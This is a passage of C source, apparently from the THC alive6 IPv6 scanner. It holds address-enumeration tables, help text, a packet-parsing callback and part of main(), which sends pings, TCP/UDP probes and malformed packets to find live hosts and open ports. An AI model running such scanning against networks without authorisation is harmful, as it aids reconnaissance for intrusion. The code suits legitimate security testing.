0, 0x500, /*to */ 0, 0, 0, 0x505, 0, 0, 0, 0x530, /*to */ 0, 0, 0, 0x53f, 0, 0, 0, 0x555, /*to */ 0, 0, 0, 0x555, 0, 0, 0, 0x600, /*to */ 0, 0, 0, 0x605, 0, 0, 0, 0x666, /*to */ 0, 0, 0, 0x667, 0, 0, 0, 0x700, /*to */ 0, 0, 0, 0x703, 0, 0, 0, 0x800, /*to */ 0, 0, 0, 0x803, 0, 0, 0, 0x900, /*to */ 0, 0, 0, 0x903, 0, 0, 0, 0xaaa, /*to */ 0, 0, 0, 0xaaa, 0, 0, 0, 0xc38, /*to */ 0, 0, 0, 0xc38, 0, 0, 0, 0x9dd, /*to */ 0, 0, 0, 0x9dd, 0, 0, 0, 0xff0, /*to */ 0, 0, 0, 0xfff, 0, 0, 0, 0x1000, /*to */ 0, 0, 0, 0x1111, 0, 0, 0, 0x1337, /*to */ 0, 0, 0, 0x1337, 0, 0, 0, 0x14e9, /*to */ 0, 0, 0, 0x14e9, 0, 0, 0, 0x1a0b, /*to */ 0, 0, 0, 0x1a0b, 0, 0, 0, 0x1f40, /*to */ 0, 0, 0, 0x1f40, 0, 0, 0, 0x1f90, /*to */ 0, 0, 0, 0x1f90, 0, 0, 0, 0x2000, /*to */ 0, 0, 0, 0x2111, 0, 0, 0, 0x3000, /*to */ 0, 0, 0, 0x3011, 0, 0, 0, 0x3128, /*to */ 0, 0, 0, 0x3128, 0, 0, 0, 0x2525, /*to */ 0, 0, 0, 0x2525, 0, 0, 0, 0x5353, /*to */ 0, 0, 0, 0x5353, 0, 0, 0, 0x6666, /*to */ 0, 0, 0, 0x6667, 0, 0, 0, 0x8000, /*to */ 0, 0, 0, 0x8000, 0, 0, 0, 0x8080, /*to */ 0, 0, 0, 0x8080, 0, 0, 0, 0xaaaa, /*to */ 0, 0, 0, 0xaaaa, 0, 0, 0, 0xabcd, /*to */ 0, 0, 0, 0xabcd, 0, 0, 0, 0xbabe, /*to */ 0, 0, 0, 0xbabe, 0, 0, 0, 0xbeef, /*to */ 0, 0, 0, 0xbeef, 0, 0, 0, 0xcafe, /*to */ 0, 0, 0, 0xcafe, 0, 0, 0, 0xc0de, /*to */ 0, 0, 0, 0xc0de, 0, 0, 0, 0xdead, /*to */ 0, 0, 0, 0xdead, 0, 0, 0, 0xf500, /*to */ 0, 0, 0, 0xf500, 0, 0, 0, 0xfeed, /*to */ 0, 0, 0, 0xfeed, 0, 0, 0, 0xfff0, /*to */ 0, 0, 0, 0xffff, 0, 0, 1, 0, /*to */ 0, 0, 1, 0x1ff, 0, 0, 2, 0, /*to */ 0, 0, 0x1bb, 5, 0, 0, 2, 0xa, /*to */ 0, 0, 2, 0x20, 0, 0, 2, 0x21, /*to */ 0, 0, 3, 0x21, 0, 0, 2, 0x22, /*to */ 0, 0, 3, 0x22, 0, 0, 2, 0x25, /*to */ 0, 0, 9, 0x25, 0, 0, 2, 0x50, /*to */ 0, 0, 9, 0x50, 0, 0, 2, 0x53, /*to */ 0, 0, 9, 0x53, 0, 0, 2, 0x80, /*to */ 0, 0, 9, 0x80, 0, 0, 2, 0x1bb, /*to */ 0, 0, 9, 0x1bb, 0, 0, 2, 0x500, /*to */ 0, 0, 9, 0x500, 0, 0, 2, 6, /*to */ 0, 0, 9, 9, 0, 0, 0xa, 0, /*to */ 0, 0, 0xf, 2, 0, 0, 0x80, 6, /*to */ 0, 0, 
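0x80, 0x1f, 0, 0, 0x200, 0, /*to */ 0, 0, 0x200, 3, 0, 0, 0x389, 0, /*to */ 0, 0, 0x389, 3, 0, 0, 0x443, 0, /*to */ 0, 0, 0x443, 3, 0, 0, 0x500, 0, /*to */ 0, 0, 0x500, 2, 0, 0, 0x666, 0, /*to */ 0, 0, 0x669, 2, 0, 0, 0x3128, 0, /*to */ 0, 0, 0x3128, 3, 0, 0, 0x6666, 0, /*to */ 0, 0, 0x6669, 2, 0, 0, 0x8080, 0, /*to */ 0, 0, 0x8080, 3, 0, 0, 0xdead, 0xbeef, /*to */ 0, 0, 0xdead, 0xbeef, // 0, 1, 0, 0, /*to */ 0, 3, 3, 3, 0, 0, 0, 0, /*to */ 4, 4, 4, 4, // some doubles here 1, 0, 0, 5, /*to */ 1, 0, 0, 0xf, // 2, 0, 1, 0, /*to */ 2, 0, 1, 3, 2, 0, 0, 5, /*to */ 2, 0, 0, 0xd, // 1, 2, 3, 4, /*to */ 1, 2, 3, 4, 5, 0, 0, 1, /*to */ 0xff, 0, 0, 2, 0xffff, 0x00ff, 0xfe00, 0xfffe, /*to */ 0xffff, 0x00ff, 0xfe00, 0xffff, 0xffff, 0xffff, 0xffff, 0xfffe, /*to */ 0xffff, 0xffff, 0xffff, 0xfffe, 0xffff, 0xffff, 0xffff, 0xffff, /*to */ 0xffff, 0xffff, 0xffff, 0xffff }; // more keywords: // cafe, dead, beef, affe, b00b, babe, f00, fefe, ffff, 1337, 666, 0, 1

// Print the usage text and terminate the process with exit status -1.
// The extended option list and the closing notes are printed only when the
// global do_help is non-zero (set by -h); otherwise a hint to use -h is shown.
void help(char *prg) {
  printf("%s %s (c) 2013 by %s %s\n\n", prg, VERSION, AUTHOR, RESOURCE);
  printf("Syntax: %s [-CMPSdlpv] [-I srcip6] [-i file] [-o file] [-e opt] [-s port,..] [-a port,..] [-u port,..] [-W TIME] interface [unicast-or-range-or-multicast-address]\n\n", prg);
  printf("Options:\n");
  printf(" -i file check systems from input file\n");
  printf(" -o file write results to output file\n");
  printf(" -M enumerate hardware addresses (MAC) from input addresses (slow!)\n");
  printf(" -C enumerate common address space from input addresses\n");
  printf(" -4 ipv4/range test various IPv4 address encodings per network (1.2.3.4/24)\n");
  printf(" -p send a ping packet for alive check (default)\n");
  printf(" -e dst,hop send an errornous packets: destination (default), hop-by-hop\n");
  printf(" -s port,port,.. TCP-SYN packet to ports for alive check or \"portscan\"\n");
  printf(" -a port,port,.. TCP-ACK packet to ports for alive check\n");
  printf(" -u port,port,.. UDP packet to ports for alive check\n");
  printf(" -d DNS resolve alive IPv6 addresses\n");
  if (do_help) {
    printf(" -n number how often to send each packet (default: local 1, remote 2)\n");
    printf(" -W time time in ms to wait after sending a packet (default: %d)\n", waittime);
    printf(" -S slow mode, get best router for each remote target or when proxy-NA\n");
    printf(" -I srcip6 use the specified IPv6 address as source\n");
    printf(" -l use link-local address instead of global address\n");
    printf(" -P only print addresses that would be scanned, no scanning\n");
    printf(" -v verbose (twice: detailed, thrice: dumping packets)\n");
  } else
    printf(" -h to display more command line options and help\n");
  printf("\nTarget address on command line or in input file can include ranges in the form\n");
  printf("of 2001:db8::1-fff or 2001:db8::1-2:0-ffff:0:0-ffff, etc.\n");
  if (do_help) {
    printf("Do not use the ranges (from-to) option with -M, -C or -4.\n");
    printf("If you specify a remote router, fragmentation+srcroute is performed.\n");
    printf("Returns -1 on errors, 0 if a system was found alive or 1 if nothing was found.\n");
  }
  exit(-1);
}

// Classify one captured packet and report the sender once.
//
// The signature matches libpcap's pcap_handler; the registration is not in
// this part of the file, so presumably this is the capture callback.
//   foo    - user argument of the callback, unused here
//   header - capture header; only caplen (bytes actually captured) is read
//   data   - captured bytes; everything in them is attacker-controlled
//
// ok == 1 marks a direct answer to one of our probes, ok == 2 an ICMPv6 error
// that is only reported. Every offset below is relative to the start of the
// IPv6 header, with `offset` accounting for one fragment header if present.
//
// Memory-safety notes for this parser:
//   * len is a signed int while sizeof() is size_t, so a negative len (runt
//     frame) would pass a plain `len < N + sizeof(buf)` test after conversion
//     to unsigned; len is therefore rejected explicitly when <= 0.
//   * the minimum length is re-checked after a fragment header moved all
//     offsets by 8 bytes.
//   * response types are compared with strcmp(); comparing the string-literal
//     macros by pointer only works if the compiler merges identical literals.
void check_packets(u_char *foo, const struct pcap_pkthdr *header, const unsigned char *data) {
  int i, ok = 0, len = header->caplen, offset = 0, nxt;
  unsigned char *ptr = (unsigned char *) data, *p2, *p3, *orig_dst = NULL;
  const char *p1 = "unknown";   // always overwritten below, initialised for safety
  char *type = RESP_UNKNOWN, sport[16] = "", hopcount[20] = "";

  if (!rawmode) {               // skip the 14 byte Ethernet header
    ptr += 14;
    len -= 14;
  }
  if (do_hdr_size) {            // NOTE(review): do_hdr_size is declared outside this file section
    ptr += (do_hdr_size - 14);
    len -= (do_hdr_size - 14);
    if (len < 1 || (ptr[0] & 240) != 0x60)      // not an IPv6 version nibble
      return;
  }
  if (len < 1)
    return;

  if (debug)
    thc_dump_data(ptr, len, "Received Packet");
  if ((size_t) len < 48 + sizeof(buf))
    return;

  nxt = ptr[6];
  // if the destination system sends source routed packets back, unlikely though
  // if (ptr[6] == NXT_ROUTE)
  //   if ((offset = (ptr[41] + 1) * 8) + 48 + sizeof(buf) > len)
  //     return;
  if (ptr[6 + offset] == NXT_FRAG) {
    nxt = ptr[40 + offset];
    offset += 8;
    // all later reads are shifted by the fragment header, so re-validate
    if ((size_t) len < 48 + offset + sizeof(buf))
      return;
  }

  if (still_not_there == 1)
    still_not_there = 0;

  if (nxt == NXT_ICMP6 && (do_ping || do_dst || do_hop || udpports[0] != -1)) {
    if (ptr[40 + offset] == ICMP6_PINGREPLY && (do_ping || do_dst || do_hop)) {
      if (tagging == NULL) {
        // echo payload must carry our per-process marker si
        if (memcmp(ptr + 50 + offset, (char *) &si + _TAKE2, 2) == 0) {
          ok = 1;
          type = RESP_PONG;
        }
      } else {
        //printf("TAG: %s\n", ptr + 48 + offset);
        if (memcmp(ptr + 48 + offset, (char *) tagging, strlen((char *) tagging)) == 0) {
          ok = 1;
          type = RESP_PONG;
        }
      }
    } else                      // if not a ping reply, its an error packet and the size is larger
    if ((size_t) len < 96 + sizeof(buf))
      return;
    if (ptr[40 + offset] == ICMP6_PARAMPROB && (do_dst || do_hop))
      if (memcmp(ptr + len - 4, (char *) &si + _TAKE2, 2) == 0) {
        if (list == 0 && do_hop)
          ok = 2;
        else
          ok = 1;
        type = RESP_PARAMPROB;
      }
    if (ptr[40 + offset] == ICMP6_UNREACH && ptr[41 + offset] == 4 && udpports[0] != -1)
      if (memcmp(ptr + 88 + offset, (char *) &sp2 + _TAKE2, 2) == 0) {
        ok = 1;
        type = RESP_UNREACH_PORT;
        i = (ptr[90 + offset] << 8) + ptr[91 + offset];
        snprintf(sport, sizeof(sport), "%d/", i);
      }
  }

  if (nxt == NXT_UDP && udpports[0] != -1)
    if (memcmp(ptr + 42 + offset, (char *) &sp2 + _TAKE2, 2) == 0) {
      ok = 1;
      type = RESP_UDP;
    }

  if (nxt == NXT_TCP && (portscan || synports[0] != -1 || ackports[0] != -1))
    if (memcmp(ptr + 42 + offset, (char *) &sp2 + _TAKE2, 2) == 0) {
      ok = 1;
      i = ptr[41 + offset] + (ptr[40 + offset] << 8);
      snprintf(sport, sizeof(sport), "%d/", i);
      switch (ptr[53 + offset]) {       // TCP flags byte
      case (TCP_SYN + TCP_ACK):
        type = RESP_SYNACK;
        break;
      case TCP_ACK:
        type = RESP_ACK;
        break;
      case TCP_RST:            /* fall through */
      case (TCP_RST + TCP_ACK):
        type = RESP_RST;
        if (rst_means_alive == 0)
          ok = 0;
        break;
      default:
        type = RESP_OTHER;
      }
    }

  if (ok == 0 && nxt == NXT_ICMP6) {
    ok = 2;
    switch (ptr[40 + offset]) {
    case 1:
      switch (ptr[41 + offset]) {
      case 0:
        type = RESP_UNREACH_ROUTE;
        break;
      case 1:
        type = RESP_UNREACH_FW;
        break;
      case 2:
        type = RESP_UNREACH_OOSCOPE;
        break;
      case 3:
        type = RESP_UNREACH_ADDR;
        break;
      case 4:
        type = RESP_UNREACH_PORT;
        break;
      case 5:
        type = RESP_UNREACH_GRESS;
        break;
      case 6:
        type = RESP_UNREACH_REJECT;
        break;
      default:
        ok = 0;
      }
      break;
    case 2:
      type = RESP_TOOBIG;
      break;
    case 3:
      type = RESP_TTLEXCEED;
      break;
    case 4:
      type = RESP_PARAMPROB;
      break;
    case 137:
      type = RESP_REDIR;
      break;
    default:
      ok = 0;
    }
    if (ok == 0) {
      type = RESP_ERROR;
      // type:code sit behind the fragment header too, so honour offset here
      snprintf(sport, sizeof(sport), "%d:%d/", ptr[40 + offset], ptr[41 + offset]);
      ok = 2;
    } else if (len >= 88 + offset)      // quoted destination address must be inside the capture
      orig_dst = thc_ipv62notation(ptr + 72 + offset);
  }

  // duplicate suppression: alive[] stores the IPv6 source address, which is
  // always at ptr + 8 regardless of extension headers
  i = 0;
  if (verbose < 2)
    while (ok && i < alive_no) {
      if (memcmp(alive[i], ptr + 8, 16) == 0)
        ok = 0;
      i++;
    }

  if (ok) {
    if (do_hopcount)
      snprintf(hopcount, sizeof(hopcount), " {hop count: %d}", ptr[7]);
    if (portscan == 0 || verbose > 2 || (strcmp(type, RESP_UNREACH_PORT) != 0 && strcmp(type, RESP_UNREACH_FW) != 0)) {
      if (resolve)
        he = gethostbyaddr(ptr + 8, 16, AF_INET6);
      p2 = thc_ipv62notation(ptr + 8);
      printf("Alive: %s%s%s%s [%s%s%s%s]%s\n", p2, resolve ? " (" : "", resolve && he != NULL ? he->h_name : "", resolve ? ")" : "", sport, type, orig_dst != NULL ? " for " : "",
             orig_dst != NULL ? (char *) orig_dst : "", hopcount);
      if (out != NULL)
        fprintf(out, "%s%s%s%s\n", p2, resolve ? " (" : "", (resolve && he != NULL) ? he->h_name : "", resolve ? ")" : "");
      free(p2);
      if (alive_no < MAX_ALIVE && (alive[alive_no] = malloc(16)) != NULL) {
        memcpy(alive[alive_no], ptr + 8, 16);
        alive_no++;
        if (alive_no == MAX_ALIVE)
          fprintf(stderr, "Warning: more than %d alive systems detected, disabling double results check!\n", MAX_ALIVE);
      }
    }
  } else if (verbose && (size_t) len >= 96 + sizeof(buf) && nxt == NXT_ICMP6 && ptr[41 + offset] != 4 && ptr[40 + offset] < 4 && ptr[40 + offset] > 0
             && ptr[40 + 8 + offset + 6] == NXT_ICMP6) {
    if (memcmp(ptr + len - 4, (char *) &si + _TAKE2, 2) == 0) {
      if (resolve)
        he = gethostbyaddr(ptr + 8, 16, AF_INET6);
      p2 = thc_ipv62notation(ptr + 8);
      p3 = thc_ipv62notation(ptr + 24 + 40 + 8 + offset);
      switch (ptr[40 + offset]) {
      case 1:
        p1 = "unreachable";
        break;
      case 2:
        p1 = "toobig";
        break;
      case 3:
        p1 = "time-to-live-exceeded";
        break;
      }
      printf("Warning: %s%s%s%s sent an ICMP %s for %s\n", p2, resolve ? " (" : "", resolve && he != NULL ? he->h_name : "", resolve ? ")" : "", p1, p3);
      free(p2);
      free(p3);
    }
  }

  // released on every path; previously leaked when the result was suppressed
  free(orig_dst);

  if (still_not_there == 0) {
    if (ok != 1)
      still_not_there = 1;
    else
      still_not_there = -1;
  }
}

// Parse a comma separated list of decimal port numbers into ports[].
//   ports - destination array with room for MAX_PORTS entries
//   plist - option argument, e.g. "22,53,80"; it is not modified
//   param - option letter, used only in the error message
// Prints an error and exits with -1 on any character other than digits and
// commas, on more than MAX_PORTS entries, or on a value above 65535.
// An empty entry is stored as port 0.
//
// The list is parsed in place. The earlier version copied it with strcpy()
// into a variable-length array sized strlen(plist + 1), which is two bytes
// too small for the string and its terminator, so the copy wrote past the
// array on the stack.
void get_ports_from_cmdline(int ports[], char *plist, char param) {
  const char *cur = plist;
  char *end;
  long p;
  int c = 0;

  if (plist[strspn(plist, "0123456789,")] != '\0') {
    fprintf(stderr, "Error: ports must be defined by numbers and separated by a comma, e.g. \"-%c 22,53,80\"\n", param);
    exit(-1);
  }

  for (;;) {
    if (c >= MAX_PORTS) {
      fprintf(stderr, "Error: a maximum number of %d ports can be specified\n", MAX_PORTS);
      exit(-1);
    }
    // strtol() saturates on overflow, so an over-long digit string is
    // rejected by the range check instead of being undefined as with atoi()
    p = strtol(cur, &end, 10);
    if (p < 0 || p > 65535) {   // allow port zero
      fprintf(stderr, "Error: ports must be between 0 and 65535: %.*s\n", (int) (end - cur), cur);
      exit(-1);
    }
    ports[c++] = (int) p;
    if (*end != ',')
      break;
    cur = end + 1;
  }
}

// Store v (0..255) in out[0..1] so that its decimal digits appear as
// hexadecimal digits, e.g. 192 becomes the byte pair 0x01 0x92.
static void put_decimal_as_hex(unsigned char *out, unsigned char v) {
  out[0] = v / 100;
  v = v % 100;
  if (v > 9)
    v = (v / 10) * 16 + (v % 10);
  out[1] = v;
}

// Write one encoding of the IPv4 address addr4 into the lower 64 bits of
// addr6 and advance *state to the next encoding.
//   addr6 - 16 byte IPv6 address; bytes 8..15 are cleared and rewritten
//   addr4 - IPv4 address as a host-order integer (a.b.c.d, a in the top byte)
//   state - encoding selector, updated in place:
//           0  d as the last byte
//           1  d with decimal digits shown as hex digits (skipped if d <= 9)
//           2  a, b, c, d as the low bytes of the last four 16 bit groups
//           3  like 2 with decimal digits shown as hex digits (skipped if
//              every octet is <= 9)
//           4  the four octets in the last four bytes
// Returns 1 once the last encoding (state 4) was written, otherwise 0.
// Exits with -1 on a state outside 0..4.
int adress4to6(unsigned char *addr6, unsigned int addr4, char *state) {
  unsigned char a, b, c, d;

  a = (addr4 >> 24) % 256;
  b = (addr4 >> 16) % 256;
  c = (addr4 >> 8) % 256;
  d = addr4 % 256;
  memset(addr6 + 8, 0, 8);

  switch (*state) {
  case 0:
    addr6[15] = d;
    break;
  case 1:
    if (d > 9) {                // is hex different to decimal?
      put_decimal_as_hex(addr6 + 14, d);
      break;
    } else
      *state += 1;              // otherwise fall through
  case 2:
    addr6[9] = a;
    addr6[11] = b;
    addr6[13] = c;
    addr6[15] = d;
    break;
  case 3:
    if (d > 9 || c > 9 || b > 9 || a > 9) {     // is hex different to decimal?
      put_decimal_as_hex(addr6 + 8, a);
      put_decimal_as_hex(addr6 + 10, b);
      put_decimal_as_hex(addr6 + 12, c);
      put_decimal_as_hex(addr6 + 14, d);
      break;
    } else
      *state += 1;              // otherwise fall through
  case 4:
    addr6[12] = a;
    addr6[13] = b;
    addr6[14] = c;
    addr6[15] = d;
    *state += 1;
    return 1;                   // end of state reached
  default:
    fprintf(stderr, "Error: invalid address4to6 state %d!\n", *state);
    exit(-1);
  }

  *state += 1;
  return 0;
}

int main(int argc, char *argv[]) { unsigned char string[128]; // = "ip6 and dst "; unsigned char *pkt = NULL, *router6 = NULL, *cur_dst, *p2, *p3, *smac, buf2[6]; unsigned char *multicast6 = NULL, *src6 = NULL, *mac = NULL, *rmac = NULL, *routers[2]; int pkt_len = 0, prefer = PREFER_GLOBAL, fromto = 0, dictptr = 0, offset = 14; int enumerate_mac = 0, enumerate_dhcp = 0, i, j, k, l, cur_enum = 0, print_only = 0; int slow = 0, no_vendid = 0, no_nets = 0, local = -1, no_send = 1, no_send_local = 1, no_send_remote = 2, nos = 0; char *interface = NULL, *input = NULL, *output = NULL, line[128], line2[128], *ptr, *ptr2, *ptr3, do_router = 0, ok; unsigned int four_from[MAX_FOUR], four_to[MAX_FOUR], addr_cur; unsigned char fcnt = 0, bh, bm, bl, restart, use_dmac = 0, dump_all = 0; unsigned short int ip1, ip2, ip3, ip4, cip1, cip2, cip3, cip4, cip5, cip6, cip7, cip8; unsigned short int fip1, fip2, fip3, fip4, fip5, fip6, fip7, fip8, tip1, tip2, tip3, tip4, tip5, tip6, tip7, tip8; unsigned char vendid[MAX_VENDID][11], nets[MAX_NETS][8], orig_dst[16], dmac[27] = { 0, 0, 0, 0, 0, 0, 0 }; in_addr_t addr4; // unsigned char dns4buf[] = { 0xde, 0xad, 0x01, 0x00, 0x00, 0x01, 0x00, 0x00, // 0x00, 0x00, 0x00, 0x00, 0x09, 0x6c, 0x6f, 0x63, 0x61, 0x6c, // 0x68, 0x6f, 0x73, 0x74, 0x00, 0x00, 0x01, 0x00, 0x01 }; unsigned char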
dns6buf[] = { 0xba, 0xbe, 0x01, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x09, 0x6c, 0x6f, 0x63, 0x61, 0x6c, 0x68, 0x6f, 0x73, 0x74, 0x00, 0x00, 0x1c, 0x00, 0x01 }; thc_ipv6_hdr *hdr; time_t passed; pcap_t *p; FILE *in = NULL; time_t timeval; for (i = 0; i < MAX_PORTS; i++) udpports[i] = ackports[i] = synports[i] = -1; if (argc == 1) help(argv[0]); j = 0; while ((i = getopt(argc, argv, "RhH4:W:w:PSLFdrlMDCn:i:o:pvs:a:u:e:VZ:I:Xx:T:")) >= 0) { switch (i) { case 'h': do_help = 1; help(argv[0]); break; // not reached case 'H': do_hopcount = 1; break; case 'R': rst_means_alive = 0; break; case 'P': print_only = 1; break; case '4': if (fcnt >= MAX_FOUR) { fprintf(stderr, "Error: maximum number of IPv4 addresses supported is %d!\n", MAX_FOUR); exit(-1); } if ((ptr = index(optarg, '/')) == NULL) { if ((addr4 = inet_addr(optarg)) == 0xffffffff) { fprintf(stderr, "Error: option is not a valid IPv4 address: %s\n", optarg); exit(-1); } four_from[fcnt] = htonl(addr4); four_to[fcnt] = htonl(addr4); fcnt++; } else { if ((ptr2 = malloc(strlen(optarg) + 1)) == NULL) { fprintf(stderr, "Error: can not allocate memory\n"); exit(-1); } strcpy(ptr2, optarg); ptr = index(ptr2, '/'); *ptr++ = 0; if ((k = atoi(ptr)) < 8 || k > 31) { fprintf(stderr, "Error: network size may only be between /8 and /31: %s\n", optarg); exit(-1); } if ((addr4 = htonl(inet_addr(ptr2))) == 0xffffffff) { fprintf(stderr, "Error: option is not a valid IPv4 address: %s\n", ptr2); exit(-1); } free(ptr2); l = 1 << (32 - k); l--; four_to[fcnt] = (addr4 | l); l = 0xffffffff - l; four_from[fcnt] = (addr4 & l); fcnt++; } break; case 'T': tagging = optarg; break; case 'Z': use_dmac = 1; sscanf(optarg, "%x:%x:%x:%x:%x:%x", (unsigned int *) &dmac[0], (unsigned int *) &dmac[1], (unsigned int *) &dmac[2], (unsigned int *) &dmac[3], (unsigned int *) &dmac[4], (unsigned int *) &dmac[5]); break; case 'w': case 'W': waittime = atoi(optarg) * 1000; break; case 'S': slow = 1; break; case 'L': ndp_only = 1; break; case 
'V': debug = 1; break; case 'F': do_ping = 1; do_dst = 1; do_hop = 1; udpports[0] = 53; ackports[0] = 9511; synports[0] = 22; synports[1] = 25; synports[2] = 80; synports[3] = 443; synports[4] = 9511; break; case 'd': resolve = 1; break; case 'r': thc_ipv6_rawmode(1); rawmode = 1; break; case 'l': prefer = PREFER_LINK; break; case 'M': enumerate_mac = 1; break; case 'D': case 'C': enumerate_dhcp = 1; break; case 'n': no_send_local = no_send_remote = atoi(optarg); break; case 'I': if ((src6 = thc_resolve6(optarg)) == NULL) { fprintf(stderr, "Error: unable to resolve IPv6 source address %s\n", optarg); exit(-1); } break; case 'i': input = optarg; list++; if (curr == 0) curr = 1; break; case 'o': output = optarg; break; case 'p': do_ping = 1; j = (j | 1); break; case 'v': verbose++; break; case 's': j = (j | 8); if (strcasecmp(optarg, "xxx") == 0 || strncasecmp(optarg, "port", 4) == 0 || strncasecmp(optarg, "scan", 4) == 0) { portscan = 1; if (verbose < 2) verbose = 2; } else get_ports_from_cmdline(synports, optarg, 's'); break; case 'a': j = (j | 8); get_ports_from_cmdline(ackports, optarg, 'a'); break; case 'u': j = (j | 8); get_ports_from_cmdline(udpports, optarg, 'u'); break; case 'e': if (index(optarg, ',') != 0) { do_dst = 1; do_hop = 1; j = (j | 6); } else { if (strncasecmp(optarg, "dst", 3) == 0 || strncasecmp(optarg, "dest", 4) == 0) { do_dst = 1; j = (j | 4); } if (strncasecmp(optarg, "hop", 3) == 0) { do_hop = 1; j = (j | 2); } if (do_hop + do_dst == 0) { fprintf(stderr, "Error: unknown options to error packet option: %s\n", optarg); exit(-1); } } break; case 'X': dump_all = 1; break; case 'x': srcport = atoi(optarg); break; default: fprintf(stderr, "Error: unknown option -%c\n", i); exit(-1); } } if (slow && ndp_only) { fprintf(stderr, "Error: you can not use the -S and -L options togther!\n"); exit(-1); } if (j) { // reset defaults if an alive check type was chosen if ((j & 1) == 0) do_ping = 0; if ((j & 2) == 0) do_hop = 0; if ((j & 4) == 0) do_dst = 0; 
} if (verbose > 1) fprintf(stderr, "Warning: -vv disables duplicate checks, every packet will be logged.\n"); if (no_send < 1 || no_send > 10) { fprintf(stderr, "Error: -n option may only be set between 1 and 10\n"); exit(-1); } if (waittime < 0) { fprintf(stderr, "Error: -W wait time is not a positive value\n"); exit(-1); } if (do_hdr_size) offset = do_hdr_size; interface = argv[optind]; if (argv[optind + 1] != NULL && argc >= optind + 2) { ptr = argv[optind + 1]; curr = 0; } else ptr = "ff02::1"; if (ptr != NULL) { // && (index(ptr, ':') == NULL || index(ptr, '-') == NULL)) { if (verbose > 1) printf("Resolving %s ...\n", ptr); multicast6 = thc_resolve6(ptr); // if it cant resolve - no problem } if (interface == NULL) { fprintf(stderr, "Error: no interface defined!\n"); exit(-1); } if (multicast6 != NULL && multicast6[0] == 0xfe && multicast6[1] == 0x80) prefer = PREFER_LINK; if (src6 == NULL) { i = _thc_ipv6_showerrors; if (multicast6 != NULL && multicast6[0] == 0xff && multicast6[1] == 0x02) _thc_ipv6_showerrors = 0; if ((src6 = thc_get_own_ipv6(interface, multicast6, prefer)) == NULL) { fprintf(stderr, "Error: no IPv6 address found for interface %s!\n", interface); exit(-1); } _thc_ipv6_showerrors = i; } if ((smac = thc_get_own_mac(interface)) == NULL) { fprintf(stderr, "Error: no mac address found for interface %s!\n", interface); exit(-1); } if (verbose) printf("Selected source address %s to scan %s\n", thc_ipv62notation(src6), ptr); if (argv[optind + 2] != NULL && argc >= optind + 3) { if (verbose > 1) printf("Resolving %s ...\n", argv[optind + 2]); router6 = thc_resolve6(argv[optind + 2]); do_router = 1; if (use_dmac) mac = dmac; else if ((mac = thc_get_mac(interface, src6, router6)) == NULL) { fprintf(stderr, "Error: could not resolve mac address for destination router %s\n", argv[optind + 2]); exit(-1); } } //strcat(string, thc_ipv62notation(src6)); sprintf(string, "dst %s", thc_ipv62notation(src6)); if (dump_all == 0) { if (portscan || synports[0] != -1 
|| udpports[0] != -1 || ackports[0] != -1) { strcat(string, " and ( icmp6 or "); if (udpports[0] != -1) strcat(string, "udp "); if (udpports[0] != -1 && (portscan || synports[0] != -1 || ackports[0] != -1)) strcat(string, "or "); if (portscan || synports[0] != -1 || ackports[0] != -1) strcat(string, "tcp "); strcat(string, ")"); } else strcat(string, " and icmp6"); } if (multicast6 != NULL && (enumerate_mac || enumerate_dhcp) && input == NULL && multicast6[0] == 0xff) { fprintf(stderr, "Warning: -M/-C options make no sense for multicast addresses and are ignored for these\n"); enumerate_dhcp = enumerate_mac = 0; } // make the sending buffer unique si = getpid() % 65536; if (srcport == -1) { sp = 1200 + si % 30000; sp2 = htons(sp); } else { sp = srcport; sp2 = htons(srcport); } memset(vendid, 0, sizeof(vendid)); memset(nets, 0, sizeof(nets)); memset(buf2, 0, sizeof(buf2)); memset(buf, 0, sizeof(buf)); buf2[0] = NXT_INVALID; buf2[1] = 1; if (tagging == NULL) { for (i = 0; i < sizeof(buf) / 2; i++) memcpy(buf + i * 2, (char *) &si + _TAKE2, 2); } else { if (strlen(tagging) > 8) tagging[8] = 0; for (i = 0; i < (sizeof(buf) / strlen(tagging)); i++) memcpy(buf + i*(strlen(tagging)), tagging, strlen(tagging)); } if ((p = thc_pcap_init(interface, string)) == NULL) { fprintf(stderr, "Error: could not capture on interface %s with string %s\n", interface, string); exit(-1); } if (input != NULL) if ((in = fopen(input, "r")) == NULL) { fprintf(stderr, "Error: coult not open file %s\n", input); exit(-1); } if (output != NULL) { if ((out = fopen(output, "w")) == NULL) { fprintf(stderr, "Error: could not create output file %s\n", output); exit(-1); } else setvbuf(out, NULL, _IONBF, 0); // dont buffer output to file - for immediate scripting } // cur_enum states: 0 = as-is, 2 = dhcp, 1 = mac, 3 = from-to, 4 = ipv4 // curr states: 0 = cmdline, 1.. = line no. 
in input file setvbuf(stdout, NULL, _IONBF, 0); setvbuf(stderr, NULL, _IONBF, 0); if (verbose) { timeval = time(NULL); printf("Starting alive6 %s (c) 2013 by van Hauser / THC at %s\n", VERSION, ctime(&timeval)); } while (curr <= list) { ok = 1; local = -1; if (cur_enum == 0) { if (curr == 0) { // the command line target first - if present cur_dst = multicast6; } else { // input file processing, if present if (feof(in)) curr++; line[0] = 0; ptr = fgets(line, sizeof(line), in); ptr = NULL; line[sizeof(line) - 1] = 0; j = strlen(line); if (j > 0) if (line[j - 1] == '\n') { line[j - 1] = 0; j--; } if (j > 0) if (line[j - 1] == '\r') { line[j - 1] = 0; j--; } if (j > 0) { ptr = line + j - 1; while (*ptr == ' ' || *ptr == '\t') *ptr-- = 0; ptr = line; while (*ptr == ' ' || *ptr == '\t') ptr++; if (*ptr == '#') ptr = NULL; } else ok = 0; } // from here for both target input options if (ptr != NULL && (index(ptr, '-') != NULL && index(ptr, '.') == NULL) && index(ptr, ':') != NULL) { fromto = 1; cur_enum = 3; } else { if (ok && verbose > 1) printf("Resolving %s ...\n", ptr); if ((cur_dst = thc_resolve6(ptr)) == NULL) { if (ok) fprintf(stderr, "Warning: could not resolve %s, skipping\n", ptr); ok = 0; } else { memcpy(orig_dst, cur_dst, 16); local = thc_is_dst_local(interface, cur_dst); if (enumerate_dhcp || fcnt > 0) { /* if (local > 0) { if (cur_dst[0] != 0xff) if ((p2 = thc_ipv62notation(cur_dst)) != NULL) { fprintf(stderr, "Warning: enumeration on local address %s disabled, use ff02::1!\n", p2); free(p2); } } else*/ { i = 0; if (no_nets > 0) for (j = 0; j < no_nets; j++) if (memcmp(nets[j], cur_dst, 8) == 0) i = 1; if (i == 0) { if (enumerate_dhcp) cur_enum = 2; else cur_enum = 4; restart = 1; if (no_nets < MAX_NETS) { memcpy(nets[no_nets], cur_dst, 8); no_nets++; if (no_nets == MAX_NETS) 